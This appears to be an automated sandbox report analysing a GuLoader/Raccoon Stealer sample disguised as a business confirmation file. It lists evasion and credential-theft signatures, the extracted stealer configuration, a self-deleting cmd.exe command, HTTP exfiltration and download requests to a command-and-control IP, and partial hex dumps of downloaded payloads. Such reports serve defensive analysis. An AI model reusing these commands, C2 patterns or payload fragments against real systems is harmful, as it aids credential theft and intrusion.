Play interactive tour

Edit tour

Analysis Report CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Overview

General Information

Sample Name:	CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
Analysis ID:	378098
MD5:	edeff76475b73d1ea8f9f8eb8afdb738
SHA1:	0ec4cf852db313d8d6c7896f4a8fd10f73228749
SHA256:	a214379d617efa77932adcbd90240cf0fb0ba443b50d4f93475edde4d53b1681
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Raccoon

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Yara detected GuLoader

Yara detected Raccoon Stealer

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Checks if the current process is being debugged

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Downloads executable code via HTTP

Drops PE files

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe (PID: 6592 cmdline: 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe' MD5: EDEFF76475B73D1EA8F9F8EB8AFDB738)

CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe (PID: 5668 cmdline: 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe' MD5: EDEFF76475B73D1EA8F9F8EB8AFDB738)

cmd.exe (PID: 6744 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 6716 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"Config: ": ["00000000 -> Raccoon | 1.7.3", "Build compile date: Sat Feb 27 21:25:06 2021", "Launched at: 2021.03.30 - 12:22:53 GMT", "Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user", "Running on a desktop", "-------------", "- Cookies: 1", "- Passwords: 0", "- Files: 0", "System Information:", "- System Language: English", "- System TimeZone: +1 hrs", "- IP: 84.17.52.79", "- Location: 47.431702, 8.575900 | Zurich, Zurich, Switzerland (8152)", "- ComputerName: 980108", "- Username: user", "- Windows version: NT 10.0", "- Product name: Windows 10 Pro", "- System arch: x64", "- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)", "- RAM: 8191 MB (5383 MB used)", "- Screen resolution: 1280x1024", "- Display devices:", "0) Microsoft Basic Display Adapter", "-------------", "Installed Apps:", "Adobe Acrobat Reader DC (19.012.20035)", "Adobe Refresh Manager (1.8.0)", "Google Chrome (85.0.4183.121)", "Google Update Helper (1.3.35.451)", "Java 8 Update 211 (8.0.2110.12)", "Java Auto Updater (2.8.211.12)", "Update for Skype for Business 2016 (KB4484286) 32-Bit Edition", "-------------"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668	JoeSecurity_Raccoon	Yara detected Raccoon Stealer	Joe Security
Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: machineinfo.txt.4.dr.binstr

Malware Configuration Extractor: Raccoon Stealer {"Config: ": ["00000000 -> Raccoon | 1.7.3", "Build compile date: Sat Feb 27 21:25:06 2021", "Launched at: 2021.03.30 - 12:22:53 GMT", "Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user", "Running on a desktop", "-------------", "- Cookies: 1", "- Passwords: 0", "- Files: 0", "System Information:", "- System Language: English", "- System TimeZone: +1 hrs", "- IP: 84.17.52.79", "- Location: 47.431702, 8.575900 | Zurich, Zurich, Switzerland (8152)", "- ComputerName: 980108", "- Username: user", "- Windows version: NT 10.0", "- Product name: Windows 10 Pro", "- System arch: x64", "- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)", "- RAM: 8191 MB (5383 MB used)", "- Screen resolution: 1280x1024", "- Display devices:", "0) Microsoft Basic Display Adapter", "-------------", "Installed Apps:", "Adobe Acrobat Reader DC (19.012.20035)", "Adobe Refresh Manager (1.8.0)", "Google Chrome (85.0.4183.121)", "Google Update Helper (1.3.35.451)", "Java 8 Update 211 (8.0.2110.12)", "Java Auto Updater (2.8.211.12)", "Update for Skype for Business 2016 (KB4484286) 32-Bit Edition", "-------------"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: telete.in

Virustotal: Detection: 9%

Perma Link

Yara detected Raccoon Stealer

Show sources

Source: Yara match

File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 111.67.28.15:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.4:49743 version: TLS 1.2

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.4.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.4.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.4.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.4.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.4.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.4.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.4.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.4.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.4.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.4.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.4.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.4.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.4.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.4.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.4.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.4.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.4.dr

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 30 Mar 2021 12:22:48 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Thu, 11 Feb 2021 18:55:17 GMTETag: "60257d95-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 45.139.236.6
Source: global traffic	HTTP traffic detected: GET //l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 45.139.236.6
Source: global traffic	HTTP traffic detected: GET //l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 45.139.236.6
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6aContent-Length: 1401Host: 45.139.236.6

Source: Joe Sandbox View	IP Address: 195.201.225.248 195.201.225.248
Source: Joe Sandbox View	IP Address: 45.139.236.6 45.139.236.6

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.236.6

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 30 Mar 2021 12:22:51 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Thu, 11 Feb 2021 18:55:16 GMTETag: "60257d94-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 